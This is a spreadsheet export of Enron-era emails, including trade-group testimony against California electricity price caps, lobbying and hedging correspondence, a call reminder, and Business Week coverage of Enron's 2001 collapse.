First, I would like to take this opportunity to express our overall_x000D_
gratitude to the Commission for issuing its Order.  The members of WPTF_x000D_
have been bitterly frustrated by the events of the last summer, and_x000D_
equally upset by the actions of non-jurisdictional parties in their_x000D_
attempt to grab the steering wheel of restructuring, and drive it into_x000D_
the ground. As I listened to your comments last week, I took note of all_x000D_
the things you said, and the stated purpose of your actions.  After_x000D_
listening to you, and reading the Order, I very much wanted to be here_x000D_
today, even if it only afforded me a brief 5-minutes of your time.  I_x000D_
would have flown here from California even if you only allowed me one_x000D_
phrase to be uttered publicly.  And that phrase would be "Thank you._x000D_
Thank you for taking the bold step forward to revive California's_x000D_
wholesale power market.  Thank you for having the courage to stand up to_x000D_
parochial interests which are entirely self serving, and absent of any_x000D_
national policy goals."_x000D_
_x000D_
This Commission took a stab at correcting California's problems_x000D_
utilizing several measures, one of which was a $150 price cap.  Whereas_x000D_
we applaud the Commission's effort,  we find that price caps send the_x000D_
wrong signal to both suppliers and load.  We have found that price caps_x000D_
misallocate resources, and as your Staff report demonstrates, increases_x000D_
exports of power to other parts of the grid where no caps exists.  We_x000D_
find that price caps discourage demand-side participation, and at the_x000D_
level proposed, will discourage much needed peaking generation_x000D_
resources.  We also find that any price cap, but especially at the level_x000D_
you have proposed, will create unintended consequences.  For example,_x000D_
when market bids exceed $150, sellers will avoid bidding into the ISO or_x000D_
the PX.  Will the market solution be as simple as bidding instead into a_x000D_
competitive exchange to the PX, such as APX, or AlTrade?  Will the_x000D_
liquidity of the bids suddenly flip from one market to another because_x000D_
of an arbitrary line below which the single price auction operates, and_x000D_
above which the bilateral market prevails?  That is a huge hammer, a_x000D_
huge movement of tens of millions of dollars moving within the space of_x000D_
an hour from one trading vehicle to another._x000D_
_x000D_
WPTF has been against price caps, and continues to believe that price_x000D_
caps do much damage, and do not protect consumers.  The damages include_x000D_
prolonging high prices, reducing price discovery, and reducing the_x000D_
quantity of long-term offers that otherwise would afford consumers_x000D_
much-needed price protection.  Average prices do not diminish with caps,_x000D_
in fact, as you know, August prices in California were much higher than_x000D_
last June, even though the buyer price cap imposed by the ISO Governing_x000D_
Board was $250 instead of $750._x000D_
_x000D_
We recognize that the political reality is such that regulators don't_x000D_
like price spikes, and caps are a quick solution.  If you feel that_x000D_
price caps must be imposed, then limit the damage.  We believe that_x000D_
Commissioner Hebert's price cap proposal which starts at $250, and_x000D_
increments upward by specific amounts at specific times would be the_x000D_
least damaging.  We also believe that a formulaic price cap that moves_x000D_
with respect to demand, or fuel price would be the most harmful.  Market_x000D_
participants can not conduct business with so much uncertainty hanging_x000D_
in the balance.  The Commission recognized on the matter of Governance_x000D_
that California needs regulatory stability, and the Commission is_x000D_
pursuing policy options to regain much needed stability.  On the other_x000D_
hand, floating price caps work in the opposite direction.  They reek_x000D_
havoc because they inject more uncertainty, and lessen stability.  If_x000D_
price caps are at all necessary, stick to the least damaging approach._x000D_
_x000D_
WPTF supports forward scheduling of demand, the imposition of real-time_x000D_
penalties, and we support elimination of the must-buy provision embedded_x000D_
in the California PUC Preferred Policy Decision.  Underscheduling of_x000D_
load has been a practice that has lead to economic dislocation, and_x000D_
reduced grid reliability.  Mandatory pre-scheduling will get the ISO_x000D_
back on track by prudently limiting the amount of load that can be_x000D_
exposed to real-time resolution.  Also, by eliminating the must-buy_x000D_
provision, the UDCs can no longer complain about "supply not showing_x000D_
up". Their avenues for finding cost-effective supply will be unlimited._x000D_
_x000D_
Finally, we support the replacement of the stakeholder boards with_x000D_
independent board members.  Whereas we have been troubled by the antics_x000D_
of the ISO Governing Board, we must note that the PX Governing Board has_x000D_
not had the same type of problems. The PX Governing Board has done much_x000D_
better at finding solutions to thorny problems.  But it is asking too_x000D_
much, we think, to spare one and eliminate the other.  The actions of_x000D_
the ISO Governing Board have proven to be highly damaging to the_x000D_
credibility of electric restructuring.  Other states eschew_x000D_
restructuring after observing the endless debates, the layers upon_x000D_
layers of State interference in the workings of the California ISO_x000D_
Governing Board, and the leverage exercised by voting blocks of_x000D_
Governors with interests totally removed from the well-being of the very_x000D_
institution on whose Board they serve._x000D_
_x000D_
We are concerned that the rules you have laid out for replacing the_x000D_
stakeholder Governing Board may not be enough.  There may be incredible_x000D_
pressure placed upon the existing Board members to select candidates_x000D_
that further the aims of those that claim to protect consumers, but in_x000D_
fact, are making a power grab.  My organization promises the Commission_x000D_
that if we suspect, if we have evidence, if we detect, or otherwise_x000D_
observe actions by a few to undermine the independence of a new Board, I_x000D_
can assure you I will be back here raising my voice loudly in protest._x000D_
The California market simply can not survive serving two masters.  The_x000D_
jurisdictional tug of war must end quickly so that we all can move_x000D_
forward and pursue the goals and ambitions set out by this Commission in_x000D_
Orders 888, and 2000._x000D_
_x000D_
_x000D_
Thank you._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Jun 2000 06:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Re[28]: Pool Party - June 24</t>
  </si>
  <si>
    <t>yeah, i will.  she is great.  she thinks i am smart b/c i read the comics.  _x000D_
plus she had a breast job.</t>
  </si>
  <si>
    <t>Sun, 29 Apr 2001 13:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'geir.solberg@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'eric.linder@enron.com'})</t>
  </si>
  <si>
    <t>http://www.enernetdaily.com/</t>
  </si>
  <si>
    <t>Tue, 3 Apr 2001 04:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Another List</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know any of these people.  We should probably see if any of the EES _x000D_
business people know them.  Also, we need to find out if people we know know _x000D_
them.  For example, why hasn't Peevey been a strong advocate for open _x000D_
access?  Jeff, do you know? And Sandi, you know all these Dems very well -- _x000D_
any other ideeas?_x000D_
_x000D_
Sue Mara_x000D_
Enron Corp._x000D_
Tel: (415) 782-7802_x000D_
Fax:(415) 782-7854_x000D_
_x000D_
_x000D_
_x000D_
	Karen Denne_x000D_
	04/03/2001 07:12 AM_x000D_
		 _x000D_
		 To: Janel Guerrero/Corp/Enron@Enron, James D Steffes/NA/Enron@Enron, Richard _x000D_
Shapiro/NA/Enron@Enron, Steven J Kean/NA/Enron@Enron, Paul _x000D_
Kaufman/PDX/ECT@ECT, Jeff Dasovich/NA/Enron@Enron, Susan J _x000D_
Mara/NA/Enron@ENRON, Sandra McCubbin/NA/Enron@Enron, bhansen@lhom.com, _x000D_
hgovenar@govadv.com, sgovenar@govadv.com, Ksmith@kdscommunications.com, Harry _x000D_
Kingerski/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Another List_x000D_
_x000D_
Attached is the list compiled by Marathon of "influentials" in each of our _x000D_
priority legislative districts (this week, we're only focusing on Burton, _x000D_
Bowen, Hertzberg, Keeley and Cox).  Please review the list and let me know _x000D_
ASAP if you know anyone on the list and would be willing to make calls.  _x000D_
Thanks. kd_x000D_
_x000D_
_x000D_
_x000D_
 - List of targeted legislators April 2 2001.xls_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Mar 2001 04:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.brown@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'ron.mcnamara@enron.com', 'dan.staines@enron.com', 'mary.hain@enron.com', 'mike.roan@enron.com', 'steve.walton@enron.com', 'james.steffes@enron.com', 'christi.nicolay@enron.com', 'tom.chapman@enron.com', 'thane.twiggs@enron.com', 'joe.hartsoe@enron.com', 'donna.fulton@enron.com'})</t>
  </si>
  <si>
    <t>Transmission Week - March 19, 2001 -- 9 pages</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Jeff Brown/NA/Enron on 03/20/2001 12:43 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
FTE Newsletters &lt;FTE_Newsletters@FTENERGY.COM&gt; on 03/16/2001 01:43:12 PM_x000D_
Please respond to custserv@FTENERGY.COM_x000D_
To: TW_NEWS@LIST1.RESDATA.COM_x000D_
cc:  _x000D_
_x000D_
Subject: Transmission Week - March 19, 2001 -- 9 pages_x000D_
_x000D_
_x000D_
 - tw010319.pdf_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Jul 2000 01:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lenine.jeganathan@enron.com', 'brian.hoskins@enron.com', 'hector.campos@enron.com'})</t>
  </si>
  <si>
    <t>Trade?</t>
  </si>
  <si>
    <t>I would like to trade for your 2nd pick in the draft.  I can offer you a 2nd _x000D_
round pick and a 9th round pick.  What do you think?_x000D_
_x000D_
Eric</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 09:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>More JCC</t>
  </si>
  <si>
    <t xml:space="preserve"> The historical context..._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kevin Kindall/Corp/Enron on 12/20/2000 _x000D_
05:43 PM ---------------------------_x000D_
_x000D_
_x000D_
Kevin Kindall_x000D_
11/28/2000 09:29 AM_x000D_
To: Russell Dyk/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: JCC Writeup_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kevin Kindall/Corp/Enron on 11/28/2000 _x000D_
09:32 AM ---------------------------_x000D_
_x000D_
_x000D_
Kevin Kindall_x000D_
09/28/2000 04:44 PM_x000D_
To: James Pyke/AP/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: JCC Writeup_x000D_
_x000D_
 Here are the results that I sent to Marc De La Rouche.  The answers to both _x000D_
questions below is "yes."  As mentioned earlier, I'll send the complete _x000D_
analysis along with explanations tomorrow.   Incidentally, here is a list of _x000D_
contacts regarding LNG and JCC.  Its a bit dated, but may prove useful._x000D_
_x000D_
Clay Harris  LNG  Houston  (713) 853-1631_x000D_
Brad Hitch  LNG  Houston  (713) 345-5140_x000D_
Marc de la Roche Global Fuels Houston  (713) 853-3949_x000D_
_x000D_
Victor Santos  Global Fuels Singapore  (65) 838-9041_x000D_
Li Yin Lim  Global Fuels Singapore  (65) 838-9029_x000D_
VV Rao   LNG  Singapore  (65) 838-9043_x000D_
_x000D_
_x000D_
-Kevin Kindall_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kevin Kindall/Corp/Enron on 09/28/2000 _x000D_
04:37 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Marc De La Roche @ ECT                           06/06/2000 02:50 PM_x000D_
	_x000D_
_x000D_
To: Kevin Kindall/Corp/Enron@ENRON_x000D_
cc: Grant Masson/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: JCC &amp; Brent  _x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Kevin,_x000D_
_x000D_
Thanks for the information. For avoidance of doubt, please confirm:_x000D_
_x000D_
That the  relationship means that to hedge ten thousand barrels of JCC in _x000D_
September '00, I would have to enter into a financial transaction for 6706 _x000D_
barrels of Prompt (August) Brent, and;_x000D_
_x000D_
That this email constitutes your groups (Vince Kaminski's) sign-off on using _x000D_
this hedge ratio to hedge JCC and JCC-based products?_x000D_
_x000D_
Thanks in advance,_x000D_
_x000D_
Marc de La Roche_x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
Kevin Kindall@ENRON_x000D_
06/06/2000 02:18 PM_x000D_
To: Marc De La Roche/HOU/ECT@ECT_x000D_
cc: Grant Masson/HOU/ECT@ECT _x000D_
Subject: Re: JCC &amp; Brent  _x000D_
_x000D_
 Good afternoon.  I have performed a review of the JCC data that you sent _x000D_
some time ago.  The study was done using several different Excel workbooks, _x000D_
and are available upon request.  Relevant charts are embedded in the _x000D_
Powerpoint attachment.  Questions/comments welcome._x000D_
_x000D_
-Kevin Kindall_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 09:21:42 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.walton@enron.com', 'm..landwehr@enron.com', 'luiz.maurer@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maria.arefieva@enron.com', 'alberto.levy@enron.com', 'allison.hamilton@enron.com', 'roy.boston@enron.com', 'joe.connor@enron.com', 'stephen.burns@enron.com', 'linda.robertson@enron.com', 'bevin.hunter@enron.com', 'john.shelk@enron.com', 'j..kean@enron.com', 'carmen.perez@enron.com', 'bill.moore@enron.com', 'eric.benson@enron.com', 'carin.nersesian@enron.com', 'steve.montovano@enron.com', 'ginger.dernehl@enron.com', 'susan.mara@enron.com', 'kirsten.bellas@enron.com', 'helen.rizzo@enron.com', 'karen.huang@enron.com', 'jean.dressler@enron.com', 'lisa.assaf@enron.com', 'darran.binns@enron.com', 'gus.perez@enron.com', 'kikumi.kishigami@enron.com', 'elizabeth.linnell@enron.com', 'jeff.dasovich@enron.com', 'bernadette.hawkins@enron.com', 'l..lawrence@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rita.hartfield@enron.com', 'susan.lindberg@enron.com', 'joe.allen@enron.com', 'lara.leibman@enron.com', 'nancy.hetrick@enron.com', 'daniel.allegretti@enron.com', 'l..petrochko@enron.com', 'fino.tiberi@enron.com', 'janel.guerrero@enron.com', 'carolyn.cooney@enron.com', 'maureen.mcvicker@enron.com', 'germain.palmer@enron.com', 'tom.briggs@enron.com', 'amr.ibrahim@enron.com', 'terri.miller@enron.com', "earlene.o'connell@enron.com", 'robert.hemstock@enron.com', 'donna.fulton@enron.com', 'w..cantrell@enron.com', 'sam.leonardo@enron.com', 'dave.perrino@enron.com', 'andy.rodriquez@enron.com', 'dan.staines@enron.com', 'lora.sullivan@enron.com', 'margaret.huson@enron.com', 'richard.shapiro@enron.com', 'larry.decker@enron.com', 'jennifer.thome@enron.com', 'joseph.alamo@enron.com', 'd..steffes@enron.com', 'janine.migden@enron.com', 'charles.yeung@enron.com', 'howard.fromer@enron.com', 'bryan.gottfredson@enron.com', 'jean.ryall@enron.com', 'kerry.stroup@enron.com', 'laurie.knight@enron.com'})</t>
  </si>
  <si>
    <t>Government Affairs Dept. Call Reminder</t>
  </si>
  <si>
    <t>Another reminder.  This call will take place tomorrow @ 10:30 AM (CDT)._x000D_
_x000D_
Ginger Dernehl_x000D_
Administrative Coordinator_x000D_
Global Government Affairs_x000D_
Phone# 713-853-7751_x000D_
Fax# 713-646-8160_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Dernehl, Ginger =20_x000D_
Sent:=09Tuesday, October 16, 2001 1:25 PM_x000D_
To:=09Alamo, Joseph; Allegretti, Daniel; Allen, Joe; Alvarez, Ramon; Arefie=_x000D_
va, Maria; Assaf, Lisa; Barnes, Lynnette; Bellas, Kirsten; Benson, Eric; Bi=_x000D_
nns, Darran; Bolton, Scott; Boston, Roy; Briggs, Tom; Buerger, Rubena; Burn=_x000D_
s, Stephen; Canovas, Guillermo; Cantrell, Rebecca W.; Comnes, Alan; Connor,=_x000D_
 Joe; Cooney, Carolyn; Dasovich, Jeff; Decker, Larry; Dernehl, Ginger; Dres=_x000D_
sler, Jean; Floris, Vinio; Frank, Robert; Fromer, Howard; Fulton, Donna; Gu=_x000D_
errero, Janel; Hamilton, Allison; Hardy Jr, John; Hartfield, Rita; Hawkins,=_x000D_
 Bernadette; Hemstock, Robert; Hetrick, Nancy; Hoatson, Tom; Huang, Karen; =_x000D_
Hueter, Barbara A.; Hunter, Bevin; Huson, Margaret; Ibrahim, Amr; Kaufman, =_x000D_
Paul; Kean, Steven J.; Keene, Patrick; Kingerski, Harry; Kishigami, Kikumi;=_x000D_
 Knight, Laurie; Landwehr, Susan M.; Lassere, Donald; Lawner, Leslie; Lawre=_x000D_
nce, Linda L.; Leibman, Lara; Leonardo, Sam; Levy, Alberto; Lindberg, Susan=_x000D_
; Linnell, Elizabeth; Mara, Susan; Maurer, Luiz; McVicker, Maureen; Migden,=_x000D_
 Janine; Miller, Terri; Montovano, Steve; Moore, Bill; Nersesian, Carin; Ne=_x000D_
ustaedter, Robert; Nicolay, Christi L.; Nord, Sue; Noske, Linda J.; Novosel=_x000D_
, Sarah; O'connell, Earlene; Ogenyi, Gloria; Palmer, Germain; Perez, Carmen=_x000D_
; Perez, Gus; Perrino, Dave; Petrochko, Mona L.; Pharms, Melinda; Reyna, Ma=_x000D_
rgo; Rishe, Frank; Rizzo, Helen; Roan, Michael; Robertson, Linda; Robinson,=_x000D_
 Marchris; Rodriquez, Andy; Ryall, Jean; Shapiro, Richard; Shelk, John; Sho=_x000D_
rtridge, Pat; Staines, Dan; Steffes, James D.; Stephens, Sharonda; Stransky=_x000D_
, Joan; Stroup, Kerry; Sullivan, Kathleen; Sullivan, Lora; Thome, Jennifer;=_x000D_
 Tiberi, Fino; Twiggs, Thane; Walton, Steve; Warner, Geriann; Yeung, Charle=_x000D_
s; Yoho, Lisa_x000D_
Subject:=09Government Affairs Dept. Call Reminder_x000D_
_x000D_
Just a reminder that the next department conference call will take place on=_x000D_
 Friday, October 19 @ 10:30 AM (CDT)  The dial information is as follows:_x000D_
_x000D_
_x000D_
Number:=09=09(1-800-283-1805) domestic =20_x000D_
=09=09=09703-736-7385 (int'l #)_x000D_
_x000D_
Location:=09=09EB4701 (for those in Houston)_x000D_
_x000D_
Ginger Dernehl_x000D_
Administrative Coordinator_x000D_
Global Government Affairs_x000D_
Phone# 713-853-7751_x000D_
Fax# 713-646-8160</t>
  </si>
  <si>
    <t>Fri, 2 Nov 2001 10:07:34 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.palmer@enron.com', 'vance.meyer@enron.com', 'pat.radford@enron.com', 'leslie.hiltabrand@enron.com', 'meredith.philipp@enron.com', 'karen.denne@enron.com', 'j..kean@enron.com', 'courtney.votaw@enron.com', 'mary.clark@enron.com', 'pr &lt;.palmer@enron.com&gt;'})</t>
  </si>
  <si>
    <t>Business Week: The Enron Debacle</t>
  </si>
  <si>
    <t xml:space="preserve">NOVEMBER 12, 2001=20_x000D_
_x000D_
FINANCE=20_x000D_
Business Week_x000D_
The Enron Debacle_x000D_
Byzantine deals have shattered the energy outfit's credibility_x000D_
http://www.businessweek.com/premium/content/01_46/b3757078.htm_x000D_
Graphics:_x000D_
http://www.businessweek.com/premium/content/01_46/b3757079.htm_x000D_
http://www.businessweek.com/premium/content/01_46/b3757080.htm_x000D_
_x000D_
Executives at high-flying Enron Corp. (ENE ) never seemed overly concerned =_x000D_
with how the rest of the world viewed their business practices. Earlier thi=_x000D_
s year, the California Attorney General had to get a court order to collect=_x000D_
 documents in an industrywide investigation into energy price fixing. And w=_x000D_
hen an analyst challenged former CEO Jeffrey K. Skilling in a conference ca=_x000D_
ll to produce Enron's balance sheet, Skilling called him an "ass----." Stil=_x000D_
l, even some Enron executives worried that the company had gone too far wit=_x000D_
h two complex partnerships set up in 1999 to buy company assets and hedge i=_x000D_
nvestments. With Enron's then-chief financial officer acting as general man=_x000D_
ager of the partnerships and in a position to personally benefit from their=_x000D_
 investments, the potential for a conflict of interest and backlash from in=_x000D_
vestors seemed overwhelming. "Internally, everybody said this is not a good=_x000D_
 idea," says a source close to the company._x000D_
_x000D_
But no one could have predicted such a jaw-dropping outcome for the nation'=_x000D_
s largest and most innovative energy trader. Since Oct. 16, when Enron reve=_x000D_
aled a $35 million charge to earnings to reflect losses on those partnershi=_x000D_
ps and was forced to knock $1.2 billion off its shareholders' equity, the c=_x000D_
ompany's stock has plunged 60%. The Securities &amp; Exchange Commission is inv=_x000D_
estigating Enron's accounting for its partnerships and whether it properly =_x000D_
disclosed them to investors._x000D_
_x000D_
Suddenly the company, which brought high-tech and complex finance to energy=_x000D_
 trading, is essentially trying to avoid a run on the bank. Moody's Investo=_x000D_
rs Service has already downgraded the company's debt. Enron says it is meet=_x000D_
ing with credit agencies to calm their fears, and analysts say Enron is wor=_x000D_
king on a turnaround plan that would likely include accelerating asset sale=_x000D_
s, issuing shares, and obtaining new credit lines. Enron's board has set up=_x000D_
 a special committee to look into its controversial partnerships. But analy=_x000D_
sts also worry that Enron's trading partners could pull the plug if they lo=_x000D_
se confidence that it can honor its trades._x000D_
_x000D_
"ON CRACK?" Inside Enron, once-cocky employees are reeling. They were still=_x000D_
 puzzling over the abrupt Aug. 14 departure of CEO Skilling when the compan=_x000D_
y announced on Oct. 24 that CFO Andrew S. Fastow, architect of the controve=_x000D_
rsial private LJM investments--which got their name from the first initials=_x000D_
 of his wife and children--was removed from his post and on leave. In a ten=_x000D_
se meeting held at a Houston hotel after the latest financial disclosures, =_x000D_
soft-spoken Chairman and CEO Kenneth L. Lay faced 1,600 employees, with ano=_x000D_
ther 5,000 hooked up via the Web. One irate worker asked if he was "on crac=_x000D_
k." Lay, an economist by training, turned over day-to-day management in 199=_x000D_
7. Until Skilling quit, citing personal reasons unrelated to Enron, Lay was=_x000D_
 talking about retirement, sources say. Now he is facing his biggest fight =_x000D_
ever. "Ken is looking at a 30-year career of accomplishment going down in f=_x000D_
lames. This is just awful," says one friend._x000D_
_x000D_
On the surface, at least, Enron's off-balance-sheet maneuvering hardly seem=_x000D_
s the stuff that would crater a company. Amazingly, sources close to Enron =_x000D_
claim that one rationale for Fastow's deals was to save an estimated $30 mi=_x000D_
llion a year in investment-banking fees. Fastow's involvement in the partne=_x000D_
rships, which bought assets from Enron, including stakes in telecom and ene=_x000D_
rgy, was supposed to make the deals simpler for the investment bankers and =_x000D_
thus cheaper. They were also meant, according to sources close to the compa=_x000D_
ny, to hedge Enron's investments in potentially risky assets while allowing=_x000D_
 it to maintain some control over them. Enron says Fastow made money for hi=_x000D_
mself on some of the deals, but insiders insist there were less controversi=_x000D_
al ways to enrich him if that were the aim. Fastow did not return calls see=_x000D_
king comment. Lay, who declined to comment for this story, has said that th=_x000D_
e partnerships were properly vetted by Enron's attorneys and internal and e=_x000D_
xternal auditors and were approved by its board. A source familiar with Enr=_x000D_
on agrees: "We had the best lawyers in the world saying, `It looks fine."'_x000D_
_x000D_
But whatever Enron's reasons for creating the LJM partnerships, the problem=_x000D_
s were compounded by scanty disclosure. The deals were first revealed in a =_x000D_
1999 proxy, raising concerns from investors and analysts. By this summer, w=_x000D_
hen Enron's stock was falling and its bets in broadband were souring, compl=_x000D_
aints about LJM grew louder. So in June, Fastow pulled out of the partnersh=_x000D_
ips. When the write-offs came, Enron enraged analysts and investors further=_x000D_
 by failing to disclose the hit to equity in its third-quarter earnings pre=_x000D_
ss release. Instead, Lay mentioned it in a conference call with analysts. "=_x000D_
We found it disconcerting that the company waited to disclose the additiona=_x000D_
l $1.2 billion charge to equity in a fleeting comment in the middle of its =_x000D_
conference call," says UBS Warburg analyst Ronald Barone._x000D_
_x000D_
BAD BETS. Still, Enron's credibility did not vanish overnight. Analysts hav=_x000D_
e been lobbying for years for more information about how and where Enron ma=_x000D_
kes its money in its often byzantine trading business. While the company's =_x000D_
revenues were soaring from $9.2 billion in 1995 to $100.8 billion in 2000 a=_x000D_
nd its stock was returning 500% during the same six-year period, Enron's ag=_x000D_
gressive, even arrogant managers could ignore Wall Street's complaints with=_x000D_
 impunity. But after its stock price collapsed this year (chart), the compa=_x000D_
ny's attitude and operational missteps quickly caught up. And there was ple=_x000D_
nty to worry about. The company's $3 billion power plant in India wasn't pa=_x000D_
ying its bills amid a political controversy; its highly ballyhooed business=_x000D_
 for trading high-speed communications capacity was crippled by the telecom=_x000D_
 industry meltdown; and its calamitous foray into the water business with A=_x000D_
zurix Corp. has already cost Enron at least $574 million in write-offs._x000D_
_x000D_
These bad bets and the expensive LJM shock have investors worried about wha=_x000D_
t else might be lurking at Enron. Many aren't sticking around to find out. =_x000D_
"I think the lack of disclosure on their financial engineering killed the c=_x000D_
redibility of the management team," says Richard A. Giesen, who manages the=_x000D_
 Munder Power Plus fund, which dumped its Enron shares about a month ago._x000D_
_x000D_
It's not clear just how many off-balance-sheet financing vehicles Enron has=_x000D_
 used over time. Some were created years ago to finance oil and gas produce=_x000D_
rs. Analysts and sources close to the deals say there's no particular risk =_x000D_
in these to Enron shareholders. Other interconnected entities, such as Whit=_x000D_
ewing, Osprey, Atlantic Water Trust, and Marlin Water Trust, were a way to =_x000D_
get assets no longer central to Enron's strategy off its balance sheet, fre=_x000D_
eing capital and credit for the core energy business and ventures like broa=_x000D_
dband (table)._x000D_
_x000D_
To entice institutional investors such as pension funds and insurers into t=_x000D_
hese deals, Enron promised to kick in equity if asset sales weren't enough =_x000D_
to cover debt. Such "mandatory equity" deals have been used by at least a h=_x000D_
alf-dozen others in the energy and telecom industries, including El Paso (E=_x000D_
PG), Williams, and Dominion, says Standard &amp; Poor's director Todd A. Shipma=_x000D_
n. "Nobody's going to find anything that's particularly unique or below boa=_x000D_
rd" in such deals, says one investment banker specializing in the energy bu=_x000D_
siness._x000D_
_x000D_
Worst case, which Shipman considers unlikely, Enron could be on the hook fo=_x000D_
r about $3 billion in its mandatory-equity deals. That could mean diluting =_x000D_
its shares by more than 25% at today's prices. Analyst John E. Olson at San=_x000D_
ders Morris Harris Inc. (SMHG ) figures a 9% dilution is more likely. Even =_x000D_
if this $3 billion in debt were included on Enron's balance sheet now, the =_x000D_
debt-to-capital ratio would climb to 54% from about 49% at the end of June.=_x000D_
 Such a change would pressure Enron's credit rating but not push it below i=_x000D_
nvestment grade, says Shipman._x000D_
_x000D_
HUGE HIT. Fastow's LJM, a private equity fund, was a different kind of anim=_x000D_
al, according to sources familiar with the arrangements. It bought energy a=_x000D_
nd other assets from Enron, which booked gains and losses on those deals. L=_x000D_
JM was also involved in complex hedging that was supposed to reduce the vol=_x000D_
atility of some of Enron's investments, including stakes in high-tech and t=_x000D_
elecom businesses and an interest in New Power Co., which markets power to =_x000D_
consumers. When Enron terminated these deals in September, it took the $1.2=_x000D_
 billion hit to equity._x000D_
_x000D_
But the more immediate question is whether trading partners will stick with=_x000D_
 the company. The first place that might show up is in Enron's highly succe=_x000D_
ssful online platform, which trades everything from gas and electricity to =_x000D_
weather derivatives. To reassure its partners, Enron is scrambling to shore=_x000D_
 up its liquidity. It has already tapped $3 billion in credit lines and is =_x000D_
trying to arrange another $1 billion. Shipman says he has seen no signs of =_x000D_
massive customer defections or drastically worsened credit terms. Still, ri=_x000D_
val traders are wary. "We certainly have taken a closer look at Enron in th=_x000D_
e last week to 10 days and will continue to manage the credit risk, but we'=_x000D_
re still doing business with the company as usual," says Keith G. Stamm, CE=_x000D_
O of power and gas trader Aquila Inc. (ILA )_x000D_
_x000D_
"SPEEDING TRAIN." Still, with the stock battered and rating agencies consid=_x000D_
ering further downgrades, that could rapidly change. In recent days, the un=_x000D_
certainty about Enron's future has reduced investors' appetite for Enron de=_x000D_
bt. "No one wants to speculate on the direction or their likelihood of surv=_x000D_
ival," says a credit-derivatives salesperson. "It's really difficult to get=_x000D_
 in front of a speeding train."_x000D_
_x000D_
Even if Lay can calm his trading partners, he and his management team face =_x000D_
a much tougher task of restoring their credibility on Wall Street. With the=_x000D_
 stock now hovering around $14--down from a high of $90 in August, 2000--so=_x000D_
me even believe that Enron could be a takeover target for the likes of GE C=_x000D_
apital or Royal Dutch/Shell Group. (RD ) Both declined to comment. Would En=_x000D_
ron sell? One source close to the company says Enron has talked about possi=_x000D_
ble mergers and strategic alliances in the past with Royal Dutch/Shell, amo=_x000D_
ng others. "If they're really worried about liquidity, they might take the =_x000D_
easy way out," he says._x000D_
_x000D_
If Enron does pull through this crisis, some suspect it will be a humbler, =_x000D_
more risk-averse place. The company that once believed it could expand its =_x000D_
trading and logistics empire to all manner of commodities--from advertising=_x000D_
 space to steel--will be forced to scale back its grandiose visions. That's=_x000D_
 something some investors applaud. "The company should focus on its strengt=_x000D_
hs," says William N. Adams, senior energy analyst at Banc of America Capita=_x000D_
l Management, a major shareholder. But that's a far less exciting place tha=_x000D_
n Enron's energy cowboys ever hoped to roam.=20_x000D_
_x000D_
By Stephanie Anderson Forest and Wendy Zellner in Dallas, with Heather Timm=_x000D_
ons in New York_x000D_
_x000D_
_x000D_
_x000D_
NOVEMBER 12, 2001=20_x000D_
_x000D_
FINANCE=20_x000D_
Business Week_x000D_
Derivatives Danger?_x000D_
http://www.businessweek.com/premium/content/01_46/b3757081.htm_x000D_
Lately, owners of Enron's (ENE) equity, bonds, and loans have been struggli=_x000D_
ng to understand how exposed the company is to risks of losses that they di=_x000D_
dn't know about before. Now, as a fuller picture of Enron's entanglements w=_x000D_
ith partnerships begins to emerge, investors have something else to worry a=_x000D_
bout: credit default swaps, known as CDSs for short._x000D_
_x000D_
That's financial marketspeak for insurance on bonds and bank loans. Their o=_x000D_
wners pay a premium for coverage that reimburses them for any losses they h=_x000D_
ave if their investments go bad. The CDS market has existed only for about =_x000D_
two years, but it's growing fast. Goldman, Sachs &amp; Co. (GS ) and others est=_x000D_
imate that bonds and loans with a face value of between $1 trillion and $1.=_x000D_
5 trillion are covered. Not surprisingly, big banks with hefty balance shee=_x000D_
ts such as J.P. Morgan Chase (JPM  ), Merrill Lynch (MER ), and Deutsche Ba=_x000D_
nk (DB ) dominate the market._x000D_
_x000D_
Enron, however, is a player--and the only significant one that isn't also a=_x000D_
 bank. Competitors say that although Enron has issued only between $500 mil=_x000D_
lion and $700 million worth of CDSs so far this year, it had ambitious plan=_x000D_
s to offer them online. "They don't belong in this market," says one trader=_x000D_
. "They don't understand the implications." Enron did not return calls seek=_x000D_
ing comment._x000D_
_x000D_
Of course, neither Enron nor others will have to pay out unless the loans a=_x000D_
nd bonds they're insuring turn bad. Trouble is, this year is potentially a =_x000D_
doozie for losses on corporate debt. Corporate defaults could reach a recor=_x000D_
d of $100 billion, says Standard &amp; Poor's, like BusinessWeek a unit of The =_x000D_
